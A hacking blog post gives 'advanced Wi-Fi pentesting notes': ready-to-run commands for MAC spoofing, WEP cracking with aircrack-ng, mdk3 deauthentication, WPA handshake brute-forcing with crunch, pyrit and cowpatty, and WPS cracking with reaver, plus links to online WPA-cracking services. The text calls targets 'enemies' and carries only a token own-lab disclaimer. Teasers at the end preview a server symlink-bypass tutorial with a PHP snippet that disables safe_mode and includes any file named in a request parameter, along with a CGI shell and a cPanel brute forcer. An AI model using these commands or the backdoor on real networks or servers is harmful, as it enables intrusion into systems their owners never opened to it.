Skip to main content

Advance Wi-fi Network Pentesting Notes:-


Advanced Wireless Network Pentesting Notes:-

First of all make sure to randomize your MAC address and clean your ARP tables, Use an ALPA usb wirless adapter device or whatever 


I- airdump-ng To Sniff The Traffic :

All people whom they do pentesting know this part i will not say all how packets works and how wireless AP works and how to use this tool by detail
just commands all people know out there 
commands :
1) ifconfig wlan0 up
2) macchanger –random wlan0
3) airmon-ng start wlan0
4) airodump-ng mon0
Now you will get all neighbors ( don’t do any pentest on peoples stuff please use this on your own lab )

II- WEP Cracking:-

Is easy that any noob can say i can hack the pantagon with this trick 
collecting IV keys :
minimal 5000 on 64 bit and 250000 on 128 bit
Commands :
1) airodump-ng -c (channel) -w (file name) —bssid (bssid) (interface)
2) aireplay-ng -1 0 -a (bssid) -h (Your bssid) -e (essid) (interface)
3) aircrack-ng -b (bssid) (file name-01.cap)

III- WPA and WPA2 The Hard Part :-

This is what all people fears 128 bit to 256 bit encryption but if you do a pact with the devil you will take over your enemys ( i wouldn’t talk about RAID cause it will take long time to explain so, just i will explain how to pwnage APs using some social enginering methods and usual technical skills

1) Random Passwords :

Some people are very laisy to change thier configuration, so how we know they use default configs ?
For exemple you sniff the perimeter of AP signal you see sometimes people have default SSID like “DLINK_1DE62A3″,”Thomson_A1B2H3R5″, you fear if he use a strong password i say he don’t 90% of people who don’t have any knowledge about technical stuff wouldn’t change thier password, so go to any website like this one :
http://www.nickkusters.com/Services/Thomson-SpeedTouch
Here we see that this service can calculate random SSID to get the password
and its magicly works 

2) Numerical Password :

The title discribe itself its about numerical bassed password like this one “012345678″ here people will kill thier self, so how do you know they use only numerical chars ?
Its easy try to capture 4 Way hand shake and use numerical chars first before trying anything else, make sure to use rainbow tables to make the brute force attack works faster, but it may not work 100% its up to your team work and material is it powerful or not to crack faster, for num chars it will be better than alpha num chars.
Commands :
airodump-ng -c (channel) -w (file name) —bssid (bssid) (interface)
I use this nasty tool  MDK3 :
mdk3 d “stands for deauh ” -t “stands for target” “mac address” (interface)
exmple: mdk3 d -t xx:xx:xx:xx:xx:xx mon0
3. pentest/passwords/crunch/crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ | pyrit -e BTHub3 -i – -o – passthrough | cowpatty -d – -r wpafile.cap -s WPAnum
And let it bump 

3) WPS Brute Force :-

Everyone use this lol exploit, you just brute force the WPS that will take less than 10 hours by doing this simple commands right down her 
Commands :
1) Reaver -i mon0 -b xx:xx:xx:xx:xx:xx -c “channel” –session=”any name you like” ( this option to save your work even if they close the AP ) -vv -a (stands for automatic to make the work problem free )
Exemple :
Reaver -i mon0 -b ff:ff:ff:ff:ff:ff -c 1 –session=wps -a -vv

4) Online Rainbow Tables And Online Brute Force Services :

4-1) Online Rainbow Tables Services :

This part is simple take your dumped CAP file and upload it to any online website but wait ! we ain’t finished yet, cause you must have one rule to have success on this step, you need a random SSID like “Linksys”, “Cisco”…
if so upload and you get your enemy under your feet bagin you to forgive him !!
in real world pentesting no one still use default ssid’s because its very causty and you will sounds dummy to your work mate 
Trarget : WPA-PSK
Free :
http://wpa.darkircop.org/

Free and Payed services :

http://www.renderlab.net/projects/WPA-tables/
http://www.onlinehashcrack.com/WPA-WPA2-RSNA-PSK-crack.php
https://www.cloudcracker.com/

4-2) Online Brute Force Services :-

This works the same as Rainbow Tables but here you don’t need to bother yourself pay and wait to have your key, this part its costy if you use Amazon clouds it will cost you +1000$/hour so 24 hours will cost 24k make sure to use this service if you know that the company you do pentest for will pay you more than what you will spint x5 or more time 

Free and Payed services :-

https://gpuhash.com/
https://www.cloudcracker.com/
http://aws.amazon.com/ec2/ (very costy but very fast)

Conclusion :-

These are dome major attacks that can be used to get the password but we hope someone find new vulnerabilities like the last one based on SSID but not effective, to kick AP asses, make sure to practice everyday to be ready.
More practices means more skills.
Enjoy

More resource and tutorials :

1) Book: BackTrack 5 Wireless Penetration Testing Beginner’s Guide
2) Video tutorials about Wireless attacks :
Link: http://securitytube.aircrack-ng.org/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso
3) Book: hacking exposed wireless second edition
4) Link: http://www.concise-courses.com/security/hackin9-wireless-hacking/
5) Link: http://resources.infosecinstitute.com/category/wireless-security/
-

Comments

Popular posts from this blog

10 Best Forum Software For Webmasters

10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h...

How to Hack WhatsApp using just a GIF

A picture is worth a thousand words, but a GIF is worth a thousand pictures. Today, the short looping clips, GIFs are everywhere—on your social media, on your message boards, on your chats, helping users perfectly express their emotions, making people laugh, and reliving a highlight. But what if an innocent-looking GIF greeting with Good morning, Happy Birthday, or Merry Christmas message hacks your smartphone? Well, not a theoretical idea anymore. WhatsApp has recently patched a critical security vulnerability in its app for Android, which remained unpatched for at least 3 months after being discovered, and if exploited, could have allowed remote hackers to compromise Android devices and potentially steal files and chat messages. WhatsApp Remote Code Execution Vulnerability The vulnerability, tracked as  CVE-2019-11932 , is a double-free memory corruption bug that doesn't actually reside in the WhatsApp code itself, but in an open-source GIF image parsing library that What...

|Bypass Symlink on 2013 Server With Different .htaccess and Methods by Sen Haxor |

Hi, Guys,  Please a wonderfull tutorial provided bt Sem;\  Today I gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods. So let's Get Started :) Note: This method is not applicable for Godaddy, Bluehost, Hostgator and Hostmonstor Servers. For This First You Need the Following Files : 1 -> Sen Haxor CGI Shell 2 -> sen.zip 3 -> passwd-bypass.php 4 -> Turbo Brute force Cpanel 5 - > Port.py First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode and Disabled Functions on the server . Use the Following Code : Make a php.ini with the following code safe_mode=Off And ini.php with <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo...